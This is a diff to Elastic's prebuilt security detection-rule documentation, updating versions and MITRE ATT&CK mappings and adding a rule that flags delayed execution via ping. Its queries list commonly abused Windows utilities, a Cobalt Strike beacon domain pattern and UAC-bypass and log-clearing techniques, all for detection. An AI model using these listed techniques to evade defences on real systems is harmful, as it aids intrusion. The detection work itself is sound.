Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: 
@@ -61,3 +62,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Deobfuscate/Decode Files or Information ** ID: T1140 ** Reference URL: https://attack.mitre.org/techniques/T1140/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc index 4053522fdb..c0ac08e57c 100644 --- a/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc @@ -36,7 +36,7 @@ Identifies the execution of a binary by root in Linux shared memory directories: * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc b/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc index 75678dc495..4c1a05cdf8 100644 --- a/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc @@ -35,7 +35,7 @@ Detects when the tc (transmission control) binary is utilized to set a BPF (Berk * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc index 017c9c8f1e..7e94f37c1b 100644 --- a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc @@ -30,11 +30,12 @@ Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -132,3 +133,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc index 1453893bb8..a7b5960b15 100644 --- a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc @@ -29,6 +29,7 @@ Identifies User Account Control (UAC) bypass via sdclt.exe. Attackers bypass UAC * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Data Source: Elastic Defend *Version*: 1 
@@ -77,3 +78,15 @@ sequence with maxspan=1m ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc b/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc index bda54b6b6a..5eccad1050 100644 --- a/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc @@ -34,7 +34,7 @@ Detects the use of the chkconfig binary to manually add a service for management * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc b/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc index 8ce96631dd..53c7817148 100644 --- a/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc @@ -34,11 +34,12 @@ Identifies when a user attempts to clear console history. An adversary may clear * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -111,3 +112,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Clear Command History ** ID: T1070.003 ** Reference URL: https://attack.mitre.org/techniques/T1070/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc b/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc index 25040d080a..5065b95472 100644 --- a/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc @@ -34,7 +34,7 @@ Identifies attempts to clear or disable Windows event log stores using Windows w * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -114,3 +114,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Clear Windows Event Logs ** ID: T1070.001 ** Reference URL: https://attack.mitre.org/techniques/T1070/001/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc index 13b3438bc5..51031a227b 100644 --- a/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc 
@@ -34,7 +34,7 @@ Cobalt Strike is a threat emulation platform commonly modified and used by adver * Tactic: Command and Control * Domain: Endpoint -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -58,9 +58,9 @@ This activity has been observed in FIN7 campaigns. [source, js] ---------------------------------- -((event.category: (network or network_traffic) and type: (tls or http)) - or event.dataset: (network_traffic.tls or network_traffic.http) -) and destination.domain:/[a-z]{3}.stage.[0-9]{8}\..*/ +((event.category: (network OR network_traffic) AND type: (tls OR http)) + OR event.dataset: (network_traffic.tls OR network_traffic.http) +) AND destination.domain:/[a-z]{3}.stage.[0-9]{8}\..*/ ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc index 671538a7fc..65a4f14022 100644 --- a/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc @@ -34,7 +34,7 @@ Identifies attempts to disable/modify the code signing policy through the regist * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -126,3 +126,7 @@ registry where host.os.type == "windows" and event.type : ("creation", "change") ** Name: Code Signing Policy Modification ** ID: T1553.006 ** Reference URL: https://attack.mitre.org/techniques/T1553/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc index 578096a652..42bf9f85b8 100644 
--- a/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc @@ -33,10 +33,11 @@ A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Initial Access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -80,6 +81,14 @@ process.parent.name: ( ** Name: Command and Scripting Interpreter ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ * Tactic: ** Name: Initial Access ** ID: TA0001 diff --git a/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc b/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc index 243f72f8da..8af2e9a61d 100644 --- a/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc @@ -31,10 +31,11 @@ Identifies command shell activity started via RunDLL32, which is commonly abused * Use Case: Threat Detection * Tactic: Execution * Tactic: Credential Access +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -91,3 +92,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Unsecured Credentials ** ID: T1552 ** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc b/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc index 7926d36566..18b27d882c 100644 --- a/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc @@ -30,11 +30,13 @@ Identifies Component Object Model (COM) hijacking via registry modification. Adv * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Privilege Escalation * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -153,3 +155,23 @@ registry where host.os.type == "windows" and ** Name: Component Object Model Hijacking ** ID: T1546.015 ** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc index 757f113baa..be467c00d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc @@ -32,11 +32,13 @@ Detects when the Console Window Host (conhost.exe) process is spawned by a suspi * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion +* Tactic: Privilege Escalation * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -125,3 +127,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Command and Scripting Interpreter ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc b/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc index bf4ecf6618..47a5cd387a 100644 --- a/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc @@ -30,7 +30,7 @@ Adversaries may implement command and control (C2) communications that use commo * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -181,6 +181,14 @@ network where host.os.type == "windows" and network.protocol == "dns" and ** Name: Web Service ** ID: T1102 ** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ * Tactic: ** Name: Exfiltration ** ID: TA0010 
diff --git a/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc index b5562ecc4a..eaa8c08116 100644 --- a/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc @@ -32,7 +32,7 @@ Telnet provides a command line interface for communication with a remote device * Tactic: Lateral Movement * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc index 984db8a383..813d55cd14 100644 --- a/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc @@ -32,7 +32,7 @@ Telnet provides a command line interface for communication with a remote device * Tactic: Lateral Movement * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc index 6ae044e4b6..a6cd276d64 100644 --- a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc @@ -30,7 +30,7 @@ Users can mark specific files as hidden simply by putting a "." as the first cha * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
@@ -39,47 +39,6 @@ Users can mark specific files as hidden simply by putting a "." as the first cha *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
diff --git a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc index afaadcecb9..1c5c4634a8 100644 --- a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of a hidden shared object (.so) file. Users can mark spe * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -41,47 +41,6 @@ Identifies the creation of a hidden shared object (.so) file. Users can mark spe *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
diff --git a/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc index 9029249e8c..4829fba4e6 100644 --- a/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc @@ -29,11 +29,12 @@ Detects the creation or modification of a new Group Policy based scheduled task * Domain: Endpoint * OS: Windows * Use Case: Threat Detection +* Tactic: Privilege Escalation * Tactic: Persistence * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -64,6 +65,18 @@ file where host.os.type == "windows" and event.type != "deletion" and *Framework*: MITRE ATT&CK^TM^ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Group Policy Modification +** ID: T1484.001 +** Reference URL: https://attack.mitre.org/techniques/T1484/001/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc index 65bd1f30f2..6518c31475 100644 --- a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc 
@@ -35,7 +35,7 @@ Linux cron jobs are scheduled tasks that can be leveraged by malicious actors fo * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -53,7 +53,7 @@ host.os.type : "linux" and event.action : ("change" or "file_modify_event" or "c file.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or /etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) and not (process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "5") or -file.extension : ("swp" or "swx")) +file.extension : ("swp" or "swpx")) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc b/docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc new file mode 100644 index 0000000000..9b4a0b932c --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc 
@@ -0,0 +1,149 @@ +[[delayed-execution-via-ping]] +=== Delayed Execution via Ping + +Identifies the execution of commonly abused Windows utilities via a delayed Ping execution. This behavior is often observed during malware installation and is consistent with an attacker attempting to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.entity_id with maxspan=1m + [process where host.os.type == "windows" and event.action == "start" and process.name : "ping.exe" and + process.args : "-n" and process.parent.name : "cmd.exe" and not user.id : "S-1-5-18"] + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : "cmd.exe" and + ( + process.name : ( + "rundll32.exe", "powershell.exe", + "mshta.exe", "msbuild.exe", + "certutil.exe", "regsvr32.exe", + "powershell.exe", "cscript.exe", + "wscript.exe", "wmic.exe", + "installutil.exe", "msxsl.exe", + "Microsoft.Workflow.Compiler.exe", + "ieexec.exe", "iexpress.exe", + "RegAsm.exe", "installutil.exe", + "RegSvcs.exe", "RegAsm.exe" + ) or + (process.executable : "?:\\Users\\*\\AppData\\*.exe" and not process.code_signature.trusted == true) + ) and + + not process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*") and + not (process.name : ("openssl.exe", "httpcfg.exe", "certutil.exe") and process.parent.command_line : 
"*ScreenConnectConfigurator.cmd*") and + not (process.pe.original_file_name : "DPInst.exe" and process.command_line : "driver\\DPInst_x64 /f ") and + not (process.name : "powershell.exe" and process.args : "Write-Host ======*") and + not (process.name : "wscript.exe" and process.args : "launchquiet_args.vbs" and process.parent.args : "?:\\Windows\\TempInst\\7z*") and + not (process.name : "regsvr32.exe" and process.args : ("?:\\windows\\syswow64\\msxml?.dll", "msxml?.dll", "?:\\Windows\\SysWOW64\\mschrt20.ocx")) and + not (process.name : "wscript.exe" and + process.working_directory : + ("?:\\Windows\\TempInst\\*", + "?:\\Users\\*\\AppData\\Local\\Temp\\BackupBootstrapper\\Logs\\", + "?:\\Users\\*\\AppData\\Local\\Temp\\QBTools\\")) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Virtualization/Sandbox Evasion +** ID: T1497 +** Reference URL: https://attack.mitre.org/techniques/T1497/ +* Sub-technique: +** Name: Time Based Evasion +** ID: T1497.003 +** Reference URL: https://attack.mitre.org/techniques/T1497/003/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: CMSTP +** ID: T1218.003 +** Reference URL: https://attack.mitre.org/techniques/T1218/003/ +* Sub-technique: +** Name: InstallUtil +** ID: T1218.004 +** 
